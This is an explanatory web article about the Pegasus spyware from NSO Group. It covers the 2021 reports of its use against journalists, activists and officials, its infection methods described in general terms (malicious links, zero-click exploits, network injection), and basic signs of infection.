How Pegasus spyware works and why it’s almost impossible to track it

Traces of the Pegasus spyware have been found on the phones of many journalists and activists around the world. The list of potential targets for surveillance includes more than 50 thousand people. How the Israeli spyware Pegasus works.

Pegasus is spyware that can be invisibly installed on mobile phones and other devices running some versions of the Apple iOS and Android mobile operating systems.

Developed by the Israeli company NSO Group. The developer says it is providing “authorized governments with technology to help them fight terrorism and crime” and has published sections of contracts requiring customers to use Pegasus only for criminal and national security purposes.

The developer also claims to be attentive to human rights.

Pegasus software features
Pegasus infects iPhones and Android devices via SMS, WhatsApp, iMessage, and possibly other channels. Allows you to extract messages, photos and emails, contacts and GPS data, as well as record calls and invisibly turn on the microphone and camera.

Pegasus allows the user to control the device itself and access everything stored on it. Pegasus monitors keystrokes on the infected device – all written communications and searches, even passwords, and transmits them to the client, as well as gives access to the phone’s microphone and camera.

Pegasus has evolved from a relatively simple system that mainly used socio-technical attacks to a program that does not even require a user to follow a link to hack his phone.

Pegasus mass surveillance scandal
In July 2021, there were reports in the press that authoritarian regimes were using Pegasus to hack the phones of human rights defenders, opposition journalists, and lawyers.

List of victims
The press leaked a list of more than 50,000 phone numbers of people presumably of interest to NSO Group clients. The origin of the list is unknown, as is whether these phones were hacked with the help of Pegasus.

Among the countries – NSO clients, whose law enforcement agencies and special services entered numbers into the system, there are:

  • Azerbaijan,
  • Bahrain,
  • Hungary,
  • India,
  • Kazakhstan,
  • Morocco,
  • Mexico,
  • United Arab Emirates,
  • Rwanda,
  • Saudi Arabia.

In particular, the Pegasus program was used to wiretap the phones of two women close to the Saudi journalist Jamal Khashoggi, who was killed in October 2018. Also on the list were the phone numbers of Princess Latifa, the daughter of the ruler of Dubai, Mohammed Al Maktoum, and his ex-wife, Princess Haya al-Hussein.

The Pegasus victims reportedly include about 600 government officials from 34 countries, including:

  • Iraqi President Barham Saleh,
  • South African President Cyril Ramaphosa,
  • Prime Ministers of Pakistan,
  • Egypt,
  • Morocco.

According to the Parisian newspaper Le Monde, in 2017, Moroccan intelligence identified the number used by French President Emmanuel Macron, which poses a danger of Pegasus infection.

NSO position
NSO denies the allegations. The company said the Pegasus was designed to fight terrorists and crime, and was supplied only to the military, police and intelligence services of countries that respect human rights.

The company said in a statement that the accusations made by the French NGO Forbidden Stories and the human rights group Amnesty International are based on incorrect assumptions and unconfirmed theories.

How Pegasus works

  • Malicious links

Previously, in order for the malware to take effect, the victim had to follow the malicious link: the program operators sent a text message with a link to the target’s phone number. The NSO Group used a variety of tactics to increase the likelihood of clicks.

For example, they sent spam messages in order to anger a person, and then they sent another message with a link that must be followed in order to stop receiving spam.

However, users could understand that the links were malicious and stopped responding to spam and other provocations.

No click exploits
The new tactic has been to use so-called “no-click exploits,” which rely on vulnerabilities in popular apps such as iMessage, WhatsApp and Facetime. They all receive and process data – sometimes from unknown sources.

Once the vulnerability is discovered, Pegasus infiltrates the device using the application protocol. For this, the user does not need to follow a link, read a message or answer a call.

This is how Pegasus infiltrated most messaging systems, for example:

  • Gmail,
  • Facebook,
  • WhatsApp,
  • Facetime,
  • Viber,
  • WeChat,
  • Telegram,
  • built-in messengers and Apple mail.
  • Network injections

In addition to no-click exploits, NSO Group clients can also use so-called “network injections” to gain access to the phone unnoticed. Browsing the web can expose a device to attack without clicking on a maliciously crafted link.

With this approach, the user must go to an unsecured website during their normal online activities. As soon as it goes to an unsecured site, NSO Group software can access the phone and infect it.

However, using this method is more difficult than attacking a phone with a malicious link or a no-click exploit, since it requires monitoring the use of the mobile phone until the Internet traffic is unprotected.

How to understand if a device is infected
To detect Pegasus on your device, you need to look for the most obvious sign – the presence of malicious links in text messages. These links lead to one of several domains used by the NSO Group to download spyware to your phone — this is the company’s infrastructure.

There will also be similarities in the malicious processes executed by the infected device. There are only a few dozen of them, and one of them, called Bridgehead, or BH, appears repeatedly in all malware.

A clear sequence is observed on infected devices:

  • the website was visited,
  • the application crashed,
  • some files have been changed.

If you have found a spelling error, please, notify us by selecting that text and pressing Ctrl+Enter.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Alexandr Ivanov earned his Licentiate Engineer in Systems and Computer Engineering from the Free International University of Moldova. Since 2013, Alexandr has been working as a freelance web programmer.
Function: Web Developer and Editor
Alexandr Ivanov

Spelling error report

The following text will be sent to our editors: